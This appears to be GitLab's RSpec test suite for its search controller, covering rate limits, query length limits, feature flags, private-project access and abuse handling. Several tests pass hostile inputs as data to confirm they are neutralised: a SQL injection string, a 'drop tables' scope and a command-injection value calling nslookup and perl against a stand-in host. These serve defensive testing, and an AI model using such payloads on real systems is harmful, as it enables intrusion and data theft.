# frozen_string_literal: true require 'spec_helper' RSpec.describe SearchController, feature_category: :global_search do include ExternalAuthorizationServiceHelpers context 'authorized user' do let(:user) { create(:user) } before do sign_in(user) end shared_examples_for 'support for active record query timeouts' do |action, params, method_to_stub, format| before do allow_next_instance_of(SearchService) do |service| allow(service).to receive(method_to_stub).and_raise(ActiveRecord::QueryCanceled) end end it 'renders a 408 when a timeout occurs' do get action, params: params, format: format expect(response).to have_gitlab_http_status(:request_timeout) end end describe 'GET #show', :snowplow do it_behaves_like 'when the user cannot read cross project', :show, { search: 'hello' } do it 'still allows accessing the search page' do get :show expect(response).to have_gitlab_http_status(:ok) end end it_behaves_like 'with external authorization service enabled', :show, { search: 'hello' } it_behaves_like 'support for active record query timeouts', :show, { search: 'hello' }, :search_objects, :html describe 'rate limit scope' do it 'uses current_user and search scope' do %w[projects blobs users issues merge_requests].each do |scope| expect(::Gitlab::ApplicationRateLimiter).to receive(:throttled?).with(:search_rate_limit, scope: [user, scope]) get :show, params: { search: 'hello', scope: scope } end end it 'uses just current_user when no search scope is used' do expect(::Gitlab::ApplicationRateLimiter).to receive(:throttled?).with(:search_rate_limit, scope: [user]) get :show, params: { search: 'hello' } end it 'uses just current_user when search scope is abusive' do expect(::Gitlab::ApplicationRateLimiter).to receive(:throttled?).with(:search_rate_limit, scope: [user]) get(:show, params: { search: 'hello', scope: 'hack-the-mainframe' }) expect(::Gitlab::ApplicationRateLimiter).to receive(:throttled?).with(:search_rate_limit, scope: [user]) get :show, params: { search: 'hello', scope: 'blobs' * 1000 } end context 'when search_rate_limited_scopes feature flag is disabled' do before do stub_feature_flags(search_rate_limited_scopes: false) end it 'uses just current_user' do %w[projects blobs users issues merge_requests].each do |scope| expect(::Gitlab::ApplicationRateLimiter).to receive(:throttled?).with(:search_rate_limit, scope: [user]) get :show, params: { search: 'hello', scope: scope } end end end end context 'uses the right partials depending on scope' do using RSpec::Parameterized::TableSyntax render_views let_it_be(:project) { create(:project, :public, :repository, :wiki_repo) } before do expect(::Gitlab::GitalyClient).to receive(:allow_ref_name_caching).and_call_original end subject { get(:show, params: { project_id: project.id, scope: scope, search: 'merge' }) } where(:partial, :scope) do '_blob' | :blobs '_wiki_blob' | :wiki_blobs '_commit' | :commits end with_them do it do project_wiki = create(:project_wiki, project: project, user: user) create(:wiki_page, wiki: project_wiki, title: 'merge', content: 'merge') expect(subject).to render_template("search/results/#{partial}") end end end context 'global search' do using RSpec::Parameterized::TableSyntax render_views context 'when block_anonymous_global_searches is disabled' do before do stub_feature_flags(block_anonymous_global_searches: false) end it 'omits pipeline status from load' do project = create(:project, :public) expect(Gitlab::Cache::Ci::ProjectPipelineStatus).not_to receive(:load_in_batch_for_projects) get :show, params: { scope: 'projects', search: project.name } expect(assigns[:search_objects].first).to eq project end context 'check search term length' do let(:search_queries) do char_limit = Gitlab::Search::Params::SEARCH_CHAR_LIMIT term_limit = Gitlab::Search::Params::SEARCH_TERM_LIMIT term_char_limit = Gitlab::Search::AbuseDetection::ABUSIVE_TERM_SIZE { chars_under_limit: (('a' * (term_char_limit - 1) + ' ') * (term_limit - 1))[0, char_limit], chars_over_limit: (('a' * (term_char_limit - 1) + ' ') * (term_limit - 1))[0, char_limit + 1], terms_under_limit: ('abc ' * (term_limit - 1)), terms_over_limit: ('abc ' * (term_limit + 1)), term_length_over_limit: ('a' * (term_char_limit + 1)), term_length_under_limit: ('a' * (term_char_limit - 1)), blank: '' } end where(:string_name, :expectation) do :chars_under_limit | :not_to_set_flash :chars_over_limit | :set_chars_flash :terms_under_limit | :not_to_set_flash :terms_over_limit | :set_terms_flash :term_length_under_limit | :not_to_set_flash :term_length_over_limit | :not_to_set_flash # abuse, so do nothing. :blank | :not_to_set_flash end with_them do it do get :show, params: { scope: 'projects', search: search_queries[string_name] } case expectation when :not_to_set_flash expect(controller).not_to set_flash[:alert] when :set_chars_flash expect(controller).to set_flash[:alert].to(/characters/) when :set_terms_flash expect(controller).to set_flash[:alert].to(/terms/) end end end end end context 'when block_anonymous_global_searches is enabled' do context 'for unauthenticated user' do before do sign_out(user) end it 'redirects to login page' do get :show, params: { scope: 'projects', search: '*' } expect(response).to redirect_to new_user_session_path end it 'redirects to login page when trying to circumvent the restriction' do get :show, params: { scope: 'projects', project_id: non_existing_record_id, search: '*' } expect(response).to redirect_to new_user_session_path end end context 'for authenticated user' do it 'succeeds' do get :show, params: { scope: 'projects', search: '*' } expect(response).to have_gitlab_http_status(:ok) end end context 'handling abusive search_terms' do it 'succeeds but does NOT do anything' do get :show, params: { scope: 'projects', search: '*', repository_ref: '-1%20OR%203%2B640-640-1=0%2B0%2B0%2B1' } expect(response).to have_gitlab_http_status(:ok) expect(assigns(:search_results)).to be_a Gitlab::EmptySearchResults end end end context 'tab feature flags' do subject { get :show, params: { scope: scope, search: 'term' }, format: :html } where(:feature_flag, :scope) do :global_search_code_tab | 'blobs' :global_search_issues_tab | 'issues' :global_search_merge_requests_tab | 'merge_requests' :global_search_wiki_tab | 'wiki_blobs' :global_search_commits_tab | 'commits' :global_search_users_tab | 'users' end with_them do it 'returns 200 if flag is enabled' do stub_feature_flags(feature_flag => true) subject expect(response).to have_gitlab_http_status(:ok) end it 'redirects with alert if flag is disabled' do stub_feature_flags(feature_flag => false) subject expect(response).to redirect_to search_path expect(controller).to set_flash[:alert].to(/Global Search is disabled for this scope/) end end end end it 'finds issue comments' do project = create(:project, :public) note = create(:note_on_issue, project: project) get :show, params: { project_id: project.id, scope: 'notes', search: note.note } expect(assigns[:search_objects].first).to eq note end context 'unique users tracking' do before do allow(Gitlab::UsageDataCounters::HLLRedisCounter).to receive(:track_event) end it_behaves_like 'tracking unique hll events' do subject(:request) { get :show, params: { scope: 'projects', search: 'term' } } let(:target_event) { 'i_search_total' } let(:expected_value) { instance_of(String) } end end it_behaves_like 'Snowplow event tracking with RedisHLL context' do subject { get :show, params: { group_id: namespace.id, scope: 'blobs', search: 'term' } } let(:project) { nil } let(:category) { described_class.to_s } let(:action) { 'executed' } let(:label) { 'redis_hll_counters.search.search_total_unique_counts_monthly' } let(:property) { 'i_search_total' } let(:context) do [Gitlab::Tracking::ServicePingContext.new(data_source: :redis_hll, event: property).to_context] end let(:namespace) { create(:group) } end context 'on restricted projects' do context 'when signed out' do before do sign_out(user) end it "doesn't expose comments on issues" do project = create(:project, :public, :issues_private) note = create(:note_on_issue, project: project) get :show, params: { project_id: project.id, scope: 'notes', search: note.note } expect(assigns[:search_objects].count).to eq(0) end end it "doesn't expose comments on merge_requests" do project = create(:project, :public, :merge_requests_private) note = create(:note_on_merge_request, project: project) get :show, params: { project_id: project.id, scope: 'notes', search: note.note } expect(assigns[:search_objects].count).to eq(0) end it "doesn't expose comments on snippets" do project = create(:project, :public, :snippets_private) note = create(:note_on_project_snippet, project: project) get :show, params: { project_id: project.id, scope: 'notes', search: note.note } expect(assigns[:search_objects].count).to eq(0) end end it_behaves_like 'rate limited endpoint', rate_limit_key: :search_rate_limit do let(:current_user) { user } def request get(:show, params: { search: 'foo@bar.com', scope: 'users' }) end end it 'increments the custom search sli apdex' do expect(Gitlab::Metrics::GlobalSearchSlis).to receive(:record_apdex).with( elapsed: a_kind_of(Numeric), search_scope: 'issues', search_type: 'basic', search_level: 'global' ) get :show, params: { scope: 'issues', search: 'hello world' } end context 'custom search sli error rate' do context 'when the search is successful' do it 'increments the custom search sli error rate with error: false' do expect(Gitlab::Metrics::GlobalSearchSlis).to receive(:record_error_rate).with( error: false, search_scope: 'issues', search_type: 'basic', search_level: 'global' ) get :show, params: { scope: 'issues', search: 'hello world' } end end context 'when the search raises an error' do before do allow_next_instance_of(SearchService) do |service| allow(service).to receive(:search_results).and_raise(ActiveRecord::QueryCanceled) end end it 'increments the custom search sli error rate with error: true' do expect(Gitlab::Metrics::GlobalSearchSlis).to receive(:record_error_rate).with( error: true, search_scope: 'issues', search_type: 'basic', search_level: 'global' ) get :show, params: { scope: 'issues', search: 'hello world' } end end context 'when something goes wrong before a search is done' do it 'does not increment the error rate' do expect(Gitlab::Metrics::GlobalSearchSlis).not_to receive(:record_error_rate) get :show, params: { scope: 'issues' } # no search query end end end end describe 'GET #count', :aggregate_failures do it_behaves_like 'when the user cannot read cross project', :count, { search: 'hello', scope: 'projects' } it_behaves_like 'with external authorization service enabled', :count, { search: 'hello', scope: 'projects' } it_behaves_like 'support for active record query timeouts', :count, { search: 'hello', scope: 'projects' }, :search_results, :json it 'returns the result count for the given term and scope' do create(:project, :public, name: 'hello world') create(:project, :public, name: 'foo bar') get :count, params: { search: 'hello', scope: 'projects' } expect(response).to have_gitlab_http_status(:ok) expect(json_response).to eq({ 'count' => '1' }) end describe 'rate limit scope' do it 'uses current_user and search scope' do %w[projects blobs users issues merge_requests].each do |scope| expect(::Gitlab::ApplicationRateLimiter).to receive(:throttled?).with(:search_rate_limit, scope: [user, scope]) get :count, params: { search: 'hello', scope: scope } end end it 'uses just current_user when search scope is abusive' do expect(::Gitlab::ApplicationRateLimiter).to receive(:throttled?).with(:search_rate_limit, scope: [user]) get :count, params: { search: 'hello', scope: 'hack-the-mainframe' } expect(::Gitlab::ApplicationRateLimiter).to receive(:throttled?).with(:search_rate_limit, scope: [user]) get :count, params: { search: 'hello', scope: 'blobs' * 1000 } end context 'when search_rate_limited_scopes feature flag is disabled' do before do stub_feature_flags(search_rate_limited_scopes: false) end it 'uses just current_user' do %w[projects blobs users issues merge_requests].each do |scope| expect(::Gitlab::ApplicationRateLimiter).to receive(:throttled?).with(:search_rate_limit, scope: [user]) get :count, params: { search: 'hello', scope: scope } end end end end it 'raises an error if search term is missing' do expect do get :count, params: { scope: 'projects' } end.to raise_error(ActionController::ParameterMissing) end it 'raises an error if search scope is missing' do expect do get :count, params: { search: 'hello' } end.to raise_error(ActionController::ParameterMissing) end it 'sets correct cache control headers' do get :count, params: { search: 'hello', scope: 'projects' } expect(response).to have_gitlab_http_status(:ok) expect(response.headers['Cache-Control']).to eq('max-age=60, private') expect(response.headers['Pragma']).to be_nil end it 'does NOT blow up if search param is NOT a string' do get :count, params: { search: ['hello'], scope: 'projects' } expect(response).to have_gitlab_http_status(:ok) expect(json_response).to eq({ 'count' => '0' }) get :count, params: { search: { nested: 'hello' }, scope: 'projects' } expect(response).to have_gitlab_http_status(:ok) expect(json_response).to eq({ 'count' => '0' }) end it 'does NOT blow up if repository_ref contains abusive characters' do get :count, params: { search: 'hello', repository_ref: "(nslookup%20hitqlwv501f.somewhere.bad%7C%7Cperl%20-e%20%22gethostbyname('hitqlwv501f.somewhere.bad')%22)", scope: 'projects' } expect(response).to have_gitlab_http_status(:ok) expect(json_response).to eq({ 'count' => '0' }) end it_behaves_like 'rate limited endpoint', rate_limit_key: :search_rate_limit do let(:current_user) { user } def request get(:count, params: { search: 'foo@bar.com', scope: 'users' }) end end end describe 'GET #autocomplete' do it_behaves_like 'when the user cannot read cross project', :autocomplete, { term: 'hello' } it_behaves_like 'with external authorization service enabled', :autocomplete, { term: 'hello' } it_behaves_like 'support for active record query timeouts', :autocomplete, { term: 'hello' }, :project, :json it 'returns an empty array when given abusive search term' do get :autocomplete, params: { term: ('hal' * 4000), scope: 'projects' } expect(response).to have_gitlab_http_status(:ok) expect(json_response).to match_array([]) end describe 'rate limit scope' do it 'uses current_user and search scope' do %w[projects blobs users issues merge_requests].each do |scope| expect(::Gitlab::ApplicationRateLimiter).to receive(:throttled?).with(:search_rate_limit, scope: [user, scope]) get :autocomplete, params: { term: 'hello', scope: scope } end end it 'uses just current_user when search scope is abusive' do expect(::Gitlab::ApplicationRateLimiter).to receive(:throttled?).with(:search_rate_limit, scope: [user]) get :autocomplete, params: { term: 'hello', scope: 'hack-the-mainframe' } expect(::Gitlab::ApplicationRateLimiter).to receive(:throttled?).with(:search_rate_limit, scope: [user]) get :autocomplete, params: { term: 'hello', scope: 'blobs' * 1000 } end context 'when search_rate_limited_scopes feature flag is disabled' do before do stub_feature_flags(search_rate_limited_scopes: false) end it 'uses just current_user' do %w[projects blobs users issues merge_requests].each do |scope| expect(::Gitlab::ApplicationRateLimiter).to receive(:throttled?).with(:search_rate_limit, scope: [user]) get :autocomplete, params: { term: 'hello', scope: scope } end end end end it_behaves_like 'rate limited endpoint', rate_limit_key: :search_rate_limit do let(:current_user) { user } def request get(:autocomplete, params: { term: 'foo@bar.com', scope: 'users' }) end end it 'can be filtered with params[:filter]' do get :autocomplete, params: { term: 'setting', filter: 'generic' } expect(response).to have_gitlab_http_status(:ok) expect(json_response.count).to eq(1) expect(json_response.first['label']).to match(/User settings/) end it 'makes a call to search_autocomplete_opts' do expect(controller).to receive(:search_autocomplete_opts).once get :autocomplete, params: { term: 'setting', filter: 'generic' } end it 'sets correct cache control headers' do get :autocomplete, params: { term: 'setting', filter: 'generic' } expect(response).to have_gitlab_http_status(:ok) expect(response.headers['Cache-Control']).to eq('max-age=60, private') expect(response.headers['Pragma']).to be_nil end end describe '#append_info_to_payload' do it 'appends search metadata for logging' do expect(controller).to receive(:append_info_to_payload).and_wrap_original do |method, payload| method.call(payload) expect(payload[:metadata]['meta.search.group_id']).to eq('123') expect(payload[:metadata]['meta.search.project_id']).to eq('456') expect(payload[:metadata]).not_to have_key('meta.search.search') expect(payload[:metadata]['meta.search.scope']).to eq('issues') expect(payload[:metadata]['meta.search.force_search_results']).to eq('true') expect(payload[:metadata]['meta.search.filters.confidential']).to eq('true') expect(payload[:metadata]['meta.search.filters.state']).to eq('true') expect(payload[:metadata]['meta.search.project_ids']).to eq(%w(456 789)) expect(payload[:metadata]['meta.search.type']).to eq('basic') expect(payload[:metadata]['meta.search.level']).to eq('global') expect(payload[:metadata]['meta.search.filters.language']).to eq('ruby') end get :show, params: { scope: 'issues', search: 'hello world', group_id: '123', project_id: '456', project_ids: %w(456 789), confidential: true, state: true, force_search_results: true, language: 'ruby' } end it 'appends the default scope in meta.search.scope' do expect(controller).to receive(:append_info_to_payload).and_wrap_original do |method, payload| method.call(payload) expect(payload[:metadata]['meta.search.scope']).to eq('projects') end get :show, params: { search: 'hello world', group_id: '123', project_id: '456' } end it 'appends the search time based on the search' do expect(controller).to receive(:append_info_to_payload).and_wrap_original do |method, payload| method.call(payload) expect(payload[:metadata][:global_search_duration_s]).to be_a_kind_of(Numeric) end get :show, params: { search: 'hello world', group_id: '123', project_id: '456' } end end context 'abusive searches', :aggregate_failures do let(:project) { create(:project, :public, name: 'hello world') } let(:make_abusive_request) do get :show, params: { scope: '1;drop%20tables;boom', search: 'hello world', project_id: project.id } end before do enable_external_authorization_service_check end it 'returns EmptySearchResults' do expect(Gitlab::EmptySearchResults).to receive(:new).and_call_original make_abusive_request expect(response).to have_gitlab_http_status(:ok) end end end context 'unauthorized user' do describe 'search rate limits' do using RSpec::Parameterized::TableSyntax let(:project) { create(:project, :public) } where(:endpoint, :params) do :show | { search: 'hello', scope: 'projects' } :count | { search: 'hello', scope: 'projects' } :autocomplete | { term: 'hello', scope: 'projects' } end with_them do it_behaves_like 'rate limited endpoint', rate_limit_key: :search_rate_limit_unauthenticated do def request get endpoint, params: params.merge(project_id: project.id) end end it 'uses request IP as rate limiting scope' do expect(::Gitlab::ApplicationRateLimiter).to receive(:throttled?).with(:search_rate_limit_unauthenticated, scope: [request.ip]) get endpoint, params: params.merge(project_id: project.id) end end end describe 'GET #opensearch' do render_views it 'renders xml' do get :opensearch, format: :xml doc = Nokogiri::XML.parse(response.body) expect(response).to have_gitlab_http_status(:ok) expect(doc.css('OpenSearchDescription ShortName').text).to eq('GitLab') expect(doc.css('OpenSearchDescription *').map(&:name)).to eq(%w[ShortName Description InputEncoding Image Url SearchForm]) end end end end